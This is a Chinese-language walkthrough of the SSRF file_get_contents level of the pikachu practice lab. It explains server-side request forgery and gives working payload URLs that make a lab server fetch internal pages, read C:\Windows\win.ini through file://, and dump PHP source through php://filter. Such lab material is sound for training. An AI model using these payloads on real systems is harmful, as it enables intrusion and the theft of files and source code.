目录
本系列为通过《pikachu靶场通关笔记》的SSRF关卡(共2关)渗透集合,通过对SSRF关卡源码的代码审计找到SSRF安全风险的真实原因,讲解SSRF原理并进行渗透实践,本文为SSRF关卡02-file_get_contents关卡的渗透部分。
一、SSRF
1、简介
SSRF 即服务器端请求伪造,是一种常见的网络安全风险。它主要是由于服务器端在处理用户请求时,没有对目标地址进行严格的过滤和验证,导致攻击者可以构造恶意请求,让服务器以自身的身份去访问其他内部或外部资源。
2、原理
利用 SSRF安全风险,攻击者能够通过伪造请求,绕过防火墙等安全限制,对内网的服务器进行访问和攻击,获取敏感信息,如数据库内容、用户账号密码等,还可能进行端口扫描,探测内网结构和服务分布,甚至利用SSRF风险发起进一步的攻击,如攻击其他应用程序或执行命令等,给企业和用户带来严重的安全威胁,造成数据泄露、系统瘫痪等后果。因此,及时发现和修复 SSRF安全风险对于保障网络安全至关重要。
SSRF(服务器端请求伪造)攻击流程如下:
- 攻击者向存在SSRF风险的服务器A发送恶意请求,包含指向内网主机B的地址(步骤1)。
- 服务器A未验证请求目标,直接作为代理向主机B发起请求(步骤2)。
- 主机B响应请求后(步骤3),服务器A将敏感数据返回给攻击者(步骤4)。
该安全风险绕过了网络隔离限制,使攻击者能够间接访问原本不可达的内网资源(如数据库、文件系统或云元数据),形成安全威胁。示意图通过颜色区分角色,箭头明确数据流向,虚线框突出安全边界突破。
二、file_get_contents函数
file_get_contents() 是 PHP 中的一个内置函数,其主要功能是把整个文件读入到一个字符串中。
file_get_contents(string $filename, bool $use_include_path = false, ?resource $context = null, int $offset = 0, ?int $length = null): string|false1、功能
file_get_contents()函数可以读取本地文件系统中的文件内容,也能通过 HTTP、FTP 等协议读取远程文件内容。这使得它在处理本地配置文件、获取远程 API 数据等场景下非常实用。
2、参数
$filename:必选参数,它可以是本地文件的路径,也可以是远程文件的 URL。$use_include_path:可选参数,布尔类型,默认值为false。若设置为true,PHP 会在include_path中查找文件。$context:可选参数,是一个上下文资源,可用于修改 HTTP 请求头、设置超时时间等。$offset:可选参数,整数类型,指定从文件的哪个位置开始读取。$length:可选参数,整数类型,指定要读取的字节数。
3、返回值
- 若读取成功,函数会返回文件内容的字符串。
- 若读取失败,则返回
false。
4、file_get_contents与SSRF
file_get_contents 函数是 PHP 中用于将整个文件读入到一个字符串中的函数,它本身是一个实用的工具,但在使用不当时可能会导致 SSRF(服务器端请求伪造)。file_get_contents 函数不仅可以读取本地文件,还支持通过 URL 读取远程文件,这就为攻击者提供了可乘之机。如果在使用该函数时,没有对用户输入的 URL 进行严格的验证和过滤,攻击者就可以构造恶意的 URL,让服务器去访问内部网络中的资源。
三、渗透实战
1、基本探测
访问pikachu靶场SSRF关卡的file_get_contents关卡,完整的URL如下所示。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php 
点击链接“反正都读了,那就再来一首吧(哈哈,错别字)”,如下所示新链接中为file 后跟着个 file并以 http 协议去访问本地的 info2.php 文件,其中file为可控参数。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info2.php
其中info2.php,具体文件内容如下所示,如上图所示完全展示其内容。
2、http协议
(1)访问upload-labs靶场
本次计划通过 file= http://127.0.0.1/upload-labs/ 访问同一内网的upload-labs靶场,通过SSRF安全风险来访问,URL如下所示。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/upload-labs/如下所示,成功访问到同一内网中的upload-labs靶场渗透成功。
(2)访问yijuhua.txt
如下图所示,通过SSRF链接成功访问到yijuhua.txt文档。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/test/yijuhua.txt
3、file协议
修改url为:url= file:///C:\Windows\win.ini,查看文件的内容。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=file:///C:\Windows\win.ini如下图所示,通过SSRF链接成功访问到C:\Windows\win.ini文档。
4、php://filter伪协议
(1)ssrf.php
使用php://filter协议可以获取代码源码,修改url为: ? file=php://filter/read=convert.base64-encode/resource=ssrf.php,具体如下所示。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php
base64编码后的源码复制粘贴到hackbar中,选中并选择encoding-base64 decode,如下所示。
解码后如下所示,如下内容即为真实源码。
(2)rce.php
接下来通过php://filter协议可以获取代码rce.php源码,如下所示即为base64加密后的源码。
http://192.168.59.1/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=../rce/rce.php
base64解密后的源码如下所示,渗透成功。
